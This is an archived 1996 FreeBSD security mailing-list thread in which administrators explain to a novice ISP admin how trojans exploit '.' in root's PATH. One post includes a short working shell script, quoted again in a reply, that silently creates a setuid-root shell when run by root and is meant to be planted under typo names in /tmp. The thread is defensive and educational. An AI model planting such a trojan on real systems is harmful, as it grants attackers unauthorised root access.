1996 04:00:22 -0400 (EDT) Message-Id: <199606250800.EAA05731@ns2.harborcom.net> Comments: Authenticated sender is From: "Bradley Dunn" Organization: Harbor Communications To: -Vince- Date: Tue, 25 Jun 1996 03:55:55 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: I need help on this one - please help me track this guy Reply-to: dunn@harborcom.net CC: security@FreeBSD.org Priority: normal X-mailer: Pegasus Mail for Win32 (v2.31) Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk [CC header trimmed, once again] On 24 Jun 96 at 23:46, -Vince- wrote: > > > > 2) The Cracker made a trojan script somewhere (usually exploiting > > > > some admins (roots) who have "." in their path). This way he creates > > > > a script that when run as root will make him a suid program. > > > > after this he has you by tender bits. > > > > > > Hmmm, doesn't everyone have . as their path since all . does is allow > > > someone to run stuff from the current directory... > > > > Not root! this leaves you wide open for trojans. As root you should > > have to type ./foo to run foo in the current directory. > > Hmmm, really? It seems like almost all systems root has . for the > path but if the directory for root is like read, write, execute by root > only, how will they get into it? *Sigh*. This is turning into elementary sysadmin class. If you are going to admin a system with over 1000 users, you need to learn to think security issues through. If "." is in the path, the cracker can put a trojan horse in some directory where he *can* write, and he will name it something he hopes the unsuspecting admin will execute while root. Bradley Dunn From owner-freebsd-security Tue Jun 25 01:22:54 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA00992 for security-outgoing; Tue, 25 Jun 1996 01:22:54 -0700 (PDT) Received: from asterix.insight.co.za (asterix.insight.co.za [196.27.7.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA00983; Tue, 25 Jun 1996 01:22:44 -0700 (PDT) Received: by asterix.insight.co.za (Smail3.1.29.1 #1) id m0uYTO8-000vDSC; Tue, 25 Jun 96 10:22 SAT Message-Id: From: jvisagie@insight.co.za (Johann Visagie) Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Tue, 25 Jun 1996 10:22:20 +0200 (SAT) Cc: mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: from "-Vince-" at Jun 24, 96 11:46:03 pm X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > > Hmmm, really? It seems like almost all systems root has . for the > path but if the directory for root is like read, write, execute by root > only, how will they get into it? -Vince- also writes (in response to Mark Murray): > > For much more info, I recommend "Practical Unix Security" from > > O'Reilly and Associates, (By Garfinkel?) > > I have that book but there are always ways no one knows about ;) I would suggest you _read_ it ;), specifically page 151 ff. (assuming you have the first edition), where path attacks are described. To summarise an example in that section: 1) User realises root as '.' in his path 2) User creates a file called something funny like '-i' in his home directory 3) User creates a script called 'ls' in his home directory, which first attempts to create a setuid root shell somewhere, and then calls the "real" /bin/ls 4) User tells his sysadmin there's a "funny file" in his home directory that he can't get rid of 5) Rood cd's to user's home directory and types "ls" to see what's going on. 6) Voila! Boy, this brings back memories... ;) -- V Johann Visagie | Email: jvisagie@insight.co.za | Tel: +27 83 777-4260 From owner-freebsd-security Tue Jun 25 01:23:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA01077 for security-outgoing; Tue, 25 Jun 1996 01:23:21 -0700 (PDT) Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA01036; Tue, 25 Jun 1996 01:23:07 -0700 (PDT) Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id KAA22910; Tue, 25 Jun 1996 10:22:10 +0200 Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id KAA07482; Tue, 25 Jun 1996 10:22:09 +0200 Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id JAA17930; Tue, 25 Jun 1996 09:58:52 +0200 (MET DST) From: J Wunsch Message-Id: <199606250758.JAA17930@uriah.heep.sax.de> Subject: Re: I need help on this one - please help me track this guy down! To: davidg@Root.COM Date: Tue, 25 Jun 1996 09:58:51 +0200 (MET DST) Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch) In-Reply-To: <199606250714.AAA03862@root.com> from David Greenman at "Jun 25, 96 00:14:37 am" X-Phone: +49-351-2012 669 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk As David Greenman wrote: > Actually, this particular problem can be avoided by putting "." last in > the search path rather than first. But only until someone drops this script e.g. into /tmp: #!/bin/sh if [ `id -u -r` = 0 ] ; then (cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak; chmod 04755 $HOME/.newsrc.bak) & fi echo "$0: not found." exit 1 ...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc. -- cheers, J"org joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE Never trust an operating system you don't have sources for. ;-) From owner-freebsd-security Tue Jun 25 01:32:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA01866 for security-outgoing; Tue, 25 Jun 1996 01:32:59 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA01859 for ; Tue, 25 Jun 1996 01:32:56 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA13998; Tue, 25 Jun 1996 01:32:31 -0700 (PDT) Date: Tue, 25 Jun 1996 01:32:31 -0700 (PDT) From: -Vince- To: Bradley Dunn cc: security@FreeBSD.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy In-Reply-To: <199606250800.EAA05731@ns2.harborcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Bradley Dunn wrote: > [CC header trimmed, once again] > > On 24 Jun 96 at 23:46, -Vince- wrote: > > > > > > 2) The Cracker made a trojan script somewhere (usually exploiting > > > > > some admins (roots) who have "." in their path). This way he creates > > > > > a script that when run as root will make him a suid program. > > > > > after this he has you by tender bits. > > > > > > > > Hmmm, doesn't everyone have . as their path since all . does is allow > > > > someone to run stuff from the current directory... > > > > > > Not root! this leaves you wide open for trojans. As root you should > > > have to type ./foo to run foo in the current directory. > > > > Hmmm, really? It seems like almost all systems root has . for the > > path but if the directory for root is like read, write, execute by root > > only, how will they get into it? > > *Sigh*. This is turning into elementary sysadmin class. If you are > going to admin a system with over 1000 users, you need to learn to > think security issues through. If "." is in the path, the cracker can > put a trojan horse in some directory where he *can* write, and he > will name it something he hopes the unsuspecting admin will execute > while root. Well, the problem here is one of the admins know the user and he was watching him just run the program himself, the root user had nothing to do with executing anything... Vince From owner-freebsd-security Tue Jun 25 01:35:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02066 for security-outgoing; Tue, 25 Jun 1996 01:35:40 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02046; Tue, 25 Jun 1996 01:35:32 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14088; Tue, 25 Jun 1996 01:33:22 -0700 (PDT) Date: Tue, 25 Jun 1996 01:33:21 -0700 (PDT) From: -Vince- To: Joerg Wunsch cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250758.JAA17930@uriah.heep.sax.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, J Wunsch wrote: > As David Greenman wrote: > > > Actually, this particular problem can be avoided by putting "." last in > > the search path rather than first. > > But only until someone drops this script e.g. into /tmp: > > #!/bin/sh > > if [ `id -u -r` = 0 ] ; then > (cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak; > chmod 04755 $HOME/.newsrc.bak) & > fi > > echo "$0: not found." > exit 1 > > > ...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc. Hmmm, I never thought they can get you in the /tmp directory... Vince From owner-freebsd-security Tue Jun 25 01:36:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02146 for security-outgoing; Tue, 25 Jun 1996 01:36:07 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02095; Tue, 25 Jun 1996 01:35:52 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14320; Tue, 25 Jun 1996 01:35:28 -0700 (PDT) Date: Tue, 25 Jun 1996 01:35:28 -0700 (PDT) From: -Vince- To: Johann Visagie cc: mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Johann Visagie wrote: > -Vince- wrote: > > > > Hmmm, really? It seems like almost all systems root has . for the > > path but if the directory for root is like read, write, execute by root > > only, how will they get into it? > > -Vince- also writes (in response to Mark Murray): > > > > For much more info, I recommend "Practical Unix Security" from > > > O'Reilly and Associates, (By Garfinkel?) > > > > I have that book but there are always ways no one knows about ;) > > I would suggest you _read_ it ;), specifically page 151 ff. (assuming you > have the first edition), where path attacks are described. To summarise an > example in that section: > > 1) User realises root as '.' in his path > 2) User creates a file called something funny like '-i' in his home > directory > 3) User creates a script called 'ls' in his home directory, which first > attempts to create a setuid root shell somewhere, and then calls the > "real" /bin/ls > 4) User tells his sysadmin there's a "funny file" in his home directory that > he can't get rid of > 5) Rood cd's to user's home directory and types "ls" to see what's going on. > 6) Voila! Yes but what happens if it was like this case: 1) user knows sysadmin so sysadmin creates account for him 2) user logs in and puts a file named root with the sysadmin watching him 3) user runs root and gets root... this only works if the user is using bash or sh for the login shell, if you use csh or tcsh, it doesn't work. Vince From owner-freebsd-security Tue Jun 25 01:37:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02318 for security-outgoing; Tue, 25 Jun 1996 01:37:50 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02304; Tue, 25 Jun 1996 01:37:34 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id KAA08996; Tue, 25 Jun 1996 10:36:53 +0200 (SAT) Message-Id: <199606250836.KAA08996@grumble.grondar.za> To: -Vince- cc: Mark Murray , hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 10:36:52 +0200 From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > > Example: user suspects you may be a DOS user, and are likely to try > > to type the "dir" or "cls" command every now and then (by mistake). > > > > In his home directory he places a script called "dir" that creates a > > suid shell (silently) then prints the usual "command not found" error. > > > > He then phones you, asking for support, and tries to trick you into > > running his script. Having "." in your path makes his trickery easier. > > Hmmm, that's only if we had phone support.... We don't :) but do > admins really go run a program that the user said won't run? Don't pick details. The point is that there is the problem that you could be tricked (somehow) into running a user's script instead of a system binary. This can happen even if the "." is at the end of your path if the program/script is not the name of a system app. M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Tue Jun 25 01:40:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02562 for security-outgoing; Tue, 25 Jun 1996 01:40:10 -0700 (PDT) Received: from sivka.rdy.com (sivka.rdy.com [205.149.182.19]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02509; Tue, 25 Jun 1996 01:40:00 -0700 (PDT) Received: from dima@localhost by sivka.rdy.com id BAA10117; (8.7/RDY) Tue, 25 Jun 1996 01:20:53 -0700 (PDT) From: "Dima Ruban" Message-Id: <960625012052.ZM10115@sivka.rdy.com> Date: Tue, 25 Jun 1996 01:20:51 -0700 In-Reply-To: Poul-Henning Kamp "Re: I need help on this one - please help me track this guy down!" (Jun 24, 8:28am) References: <6630.835630106@critter.tfs.com> Organization: HackerDome, Inc. X-Mailer: Z-Mail (4.0b.514 14may96) To: Poul-Henning Kamp , "Jordan K. Hubbard" Subject: Re: I need help on this one - please help me track this guy down! Cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Jun 24, 8:28am, Poul-Henning Kamp wrote: > Subject: Re: I need help on this one - please help me track this guy down! > In message <8378.835580425@time.cdrom.com>, "Jordan K. Hubbard" writes: > >Also, I think that calling the FBI on this one is only likely to get > >me put on infinite hold when they hear that the perpetrator is in > >Russia. :-) > > Yes, Russia would be an CIA issue. Hey, guys! Stop this "Russian" thing, will ya? :-) > > -- > Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. > http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. > whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. > Future will arrive by its own means, progress not so. > >-- End of excerpt from Poul-Henning Kamp -- -- dima From owner-freebsd-security Tue Jun 25 01:42:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02730 for security-outgoing; Tue, 25 Jun 1996 01:42:17 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02655; Tue, 25 Jun 1996 01:40:57 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14940; Tue, 25 Jun 1996 01:40:18 -0700 (PDT) Date: Tue, 25 Jun 1996 01:40:18 -0700 (PDT) From: -Vince- To: Mark Murray cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250836.KAA08996@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > -Vince- wrote: > > > Example: user suspects you may be a DOS user, and are likely to try > > > to type the "dir" or "cls" command every now and then (by mistake). > > > > > > In his home directory he places a script called "dir" that creates a > > > suid shell (silently) then prints the usual "command not found" error. > > > > > > He then phones you, asking for support, and tries to trick you into > > > running his script. Having "." in your path makes his trickery easier. > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > admins really go run a program that the user said won't run? > > Don't pick details. The point is that there is the problem that you > could be tricked (somehow) into running a user's script instead > of a system binary. This can happen even if the "." is at the > end of your path if the program/script is not the name of a > system app. Yeah, you have a point but jbhunt was watching the user as he hacked root since he brought the file from his own machine.... so that wasn't something the admin was tricked into doing.. Vince From owner-freebsd-security Tue Jun 25 01:43:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02849 for security-outgoing; Tue, 25 Jun 1996 01:43:11 -0700 (PDT) Received: from proxy.siemens.at (proxy.siemens.at [192.138.228.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA02364; Tue, 25 Jun 1996 01:37:57 -0700 (PDT) Received: from sol1.gud.siemens.co.at (sol-f.gud.siemens-austria) by proxy.siemens.at with SMTP id AA12616 (5.67a/IDA-1.5); Tue, 25 Jun 1996 10:36:56 +0200 Received: from ws2301.gud.siemens.co.at by sol1.gud.siemens.co.at with smtp (Smail3.1.28.1 #7 for ) id m0uYTc3-00021HC; Tue, 25 Jun 96 10:36 MET DST Received: by ws2301.gud.siemens.co.at (1.37.109.16/1.37) id AA269621747; Tue, 25 Jun 1996 10:35:47 +0200 From: "Hr.Ladavac" Message-Id: <199606250835.AA269621747@ws2301.gud.siemens.co.at> Subject: Re: I need help on this one - please help me track this guy down! To: davidg@root.com Date: Tue, 25 Jun 1996 10:35:46 +0200 (MESZ) Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: <199606250714.AAA03862@root.com> from "David Greenman" at Jun 25, 96 00:14:37 am X-Mailer: ELM [version 2.4 PL24 ME8a] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In his e-mail David Greenman wrote: > > >-Vince- wrote in message ID > >: > >> Hmmm, doesn't everyone have . as their path since all . does is allow > >> someone to run stuff from the current directory... > > > >No, everyone does NOT have `.' in their paths! I most certainly don't, > >as I know that it's ALL to easy to have someone break your system > >security that way. Imagine if you are looking into something as root, > >and have `.' in your path. You go into someone elses directory, and do > >a `ls'. All they need is a wrapper program called `ls' in that dir > >which copies /bin/sh to some directory, chowns it to root, then sets > >the setuid bit, and THEN exec's ls with the arguments given, an BANG, > >there goes your system security. > > Actually, this particular problem can be avoided by putting "." last in > the search path rather than first. But Trojan mroe versus okay more can not. Current directory has no place in path. Not even for a normal user. root should not have any path whatsoever; even though this is a tad too paranoid. /Marino > > -DG > > David Greenman > Core-team/Principal Architect, The FreeBSD Project > From owner-freebsd-security Tue Jun 25 01:46:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03110 for security-outgoing; Tue, 25 Jun 1996 01:46:19 -0700 (PDT) Received: from sivka.rdy.com (sivka.rdy.com [205.149.182.19]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA03101; Tue, 25 Jun 1996 01:46:15 -0700 (PDT) Received: from dima@localhost by sivka.rdy.com id BAA10148; (8.7/RDY) Tue, 25 Jun 1996 01:33:06 -0700 (PDT) From: "Dima Ruban" Message-Id: <960625013305.ZM10146@sivka.rdy.com> Date: Tue, 25 Jun 1996 01:33:05 -0700 In-Reply-To: "JULIAN Elischer" "Re: I need help on this one - please help me track this guy down!" (Jun 24, 1:59pm) References: <199606242059.NAA01968@ref.tfs.com> Organization: HackerDome, Inc. X-Mailer: Z-Mail (4.0b.514 14may96) To: "JULIAN Elischer" , richardc@CSUA.Berkeley.EDU (Veggy Vinny) Subject: Re: I need help on this one - please help me track this guy down! Cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Jun 24, 1:59pm, JULIAN Elischer wrote: > Subject: Re: I need help on this one - please help me track this guy down! > > > > > > > > On Mon, 24 Jun 1996, Mark Murray wrote: > > > > > > > What do you get from strings(1)? (Long shot..) > > > > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir > ^ DUH! > There was also the one that used rdist in daemon mode > to rdist itself a new copy of /etc/passwd (and friends) With rdist bug in daemon mode you were able to change permissions on any file. So you don't even have to copy password file.... :-) > > I haven't looked recently to see if that still works for FreeBSD.. > I last looked in 386BSD.. > > julian > > > >-- End of excerpt from JULIAN Elischer -- -- dima From owner-freebsd-security Tue Jun 25 01:51:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03646 for security-outgoing; Tue, 25 Jun 1996 01:51:37 -0700 (PDT) Received: from seagull.rtd.com (root@seagull.rtd.com [198.102.68.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA03634; Tue, 25 Jun 1996 01:51:33 -0700 (PDT) Received: (from dgy@localhost) by seagull.rtd.com (8.7.5/1.2) id BAA00894; Tue, 25 Jun 1996 01:51:04 -0700 (MST) From: Don Yuniskis Message-Id: <199606250851.BAA00894@seagull.rtd.com> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Tue, 25 Jun 1996 01:51:03 -0700 (MST) Cc: mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: from "-Vince-" at Jun 25, 96 00:28:34 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk It seems that -Vince- said: > > On Tue, 25 Jun 1996, Mark Murray wrote: > > > > In his home directory he places a script called "dir" that creates a > > suid shell (silently) then prints the usual "command not found" error. > > > > He then phones you, asking for support, and tries to trick you into > > running his script. Having "." in your path makes his trickery easier. > > Hmmm, that's only if we had phone support.... We don't :) but do > admins really go run a program that the user said won't run? Well, it *appears* that one of *you* did! :> From owner-freebsd-security Tue Jun 25 01:52:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03884 for security-outgoing; Tue, 25 Jun 1996 01:52:39 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA03855; Tue, 25 Jun 1996 01:52:28 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA17390; Tue, 25 Jun 1996 01:52:03 -0700 (PDT) Date: Tue, 25 Jun 1996 01:52:02 -0700 (PDT) From: -Vince- To: Don Yuniskis cc: mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250851.BAA00894@seagull.rtd.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Don Yuniskis wrote: > It seems that -Vince- said: > > > > On Tue, 25 Jun 1996, Mark Murray wrote: > > > > > > In his home directory he places a script called "dir" that creates a > > > suid shell (silently) then prints the usual "command not found" error. > > > > > > He then phones you, asking for support, and tries to trick you into > > > running his script. Having "." in your path makes his trickery easier. > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > admins really go run a program that the user said won't run? > > Well, it *appears* that one of *you* did! :> Well, jbhunt was the one who gave the user the account and the user just transferred the root which is /bin/sh with setuid and ran it and he got root.... Vince From owner-freebsd-security Tue Jun 25 02:03:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA04679 for security-outgoing; Tue, 25 Jun 1996 02:03:04 -0700 (PDT) Received: from gallup.cia-g.com (root@gallup.cia-g.com [206.206.162.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA04667 for ; Tue, 25 Jun 1996 02:02:59 -0700 (PDT) Received: from gallup.cia-g.com (gallup.cia-g.com [206.206.162.10]) by gallup.cia-g.com (8.6.11/8.6.9) with SMTP id DAA18993 for ; Tue, 25 Jun 1996 03:04:09 -0600 Date: Tue, 25 Jun 1996 03:04:08 -0600 (MDT) From: Stephen Fisher To: security@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250714.AAA03862@root.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk And for the example of people putting an sl (mistyped ls) or something in /tmp I mount world writable directories with "noexec" On Tue, 25 Jun 1996, David Greenman wrote: > >-Vince- wrote in message ID > >: > >> Hmmm, doesn't everyone have . as their path since all . does is allow > >> someone to run stuff from the current directory... > > > >No, everyone does NOT have `.' in their paths! I most certainly don't, > >as I know that it's ALL to easy to have someone break your system > >security that way. Imagine if you are looking into something as root, > >and have `.' in your path. You go into someone elses directory, and do > >a `ls'. All they need is a wrapper program called `ls' in that dir > >which copies /bin/sh to some directory, chowns it to root, then sets > >the setuid bit, and THEN exec's ls with the arguments given, an BANG, > >there goes your system security. > > Actually, this particular problem can be avoided by putting "." last in > the search path rather than first. > > -DG > > David Greenman > Core-team/Principal Architect, The FreeBSD Project > - Steve - Systems Manager - Community Internet Access - http://www.cia-g.com From owner-freebsd-security Tue Jun 25 02:04:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA04860 for security-outgoing; Tue, 25 Jun 1996 02:04:19 -0700 (PDT) Received: from seagull.rtd.com (root@seagull.rtd.com [198.102.68.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA04855; Tue, 25 Jun 1996 02:04:16 -0700 (PDT) Received: (from dgy@localhost) by seagull.rtd.com (8.7.5/1.2) id CAA01576; Tue, 25 Jun 1996 02:03:35 -0700 (MST) From: Don Yuniskis Message-Id: <199606250903.CAA01576@seagull.rtd.com> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Tue, 25 Jun 1996 02:03:35 -0700 (MST) Cc: dgy@rtd.com, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: from "-Vince-" at Jun 25, 96 01:52:02 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk It seems that -Vince- said: > > On Tue, 25 Jun 1996, Don Yuniskis wrote: > > > It seems that -Vince- said: > > > Hmmm, that's only if we had phone support.... We don't :) but do > > > admins really go run a program that the user said won't run? > > > > Well, it *appears* that one of *you* did! :> > > Well, jbhunt was the one who gave the user the account and the > user just transferred the root which is /bin/sh with setuid and ran it > and he got root.... Um, someone can (and undoubtedly *will* :>) correct me if I'm wrong but there's *NO WAY* to install a setuid binary *without* having root in the first place! So, he could copy the program onto your machine and the system would strip the "setuid" bit automatically. Otherwise, there's no point in the setuid mechanism as anyone could make a setuid binary on their own system and just upload it to yours! From owner-freebsd-security Tue Jun 25 02:22:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA07137 for security-outgoing; Tue, 25 Jun 1996 02:22:38 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA07114; Tue, 25 Jun 1996 02:22:32 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id CAA20749; Tue, 25 Jun 1996 02:22:11 -0700 (PDT) Date: Tue, 25 Jun 1996 02:22:11 -0700 (PDT) From: -Vince- To: Don Yuniskis cc: dgy@rtd.com, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250903.CAA01576@seagull.rtd.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Don Yuniskis wrote: > It seems that -Vince- said: > > > > On Tue, 25 Jun 1996, Don Yuniskis wrote: > > > > > It seems that -Vince- said: > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > > > admins really go run a program that the user said won't run? > > > > > > Well, it *appears* that one of *you* did! :> > > > > Well, jbhunt was the one who gave the user the account and the > > user just transferred the root which is /bin/sh with setuid and ran it > > and he got root.... > > Um, someone can (and undoubtedly *will* :>) correct me if I'm wrong > but there's *NO WAY* to install a setuid binary *without* having root > in the first place! So, he could copy the program onto your > machine and the system would 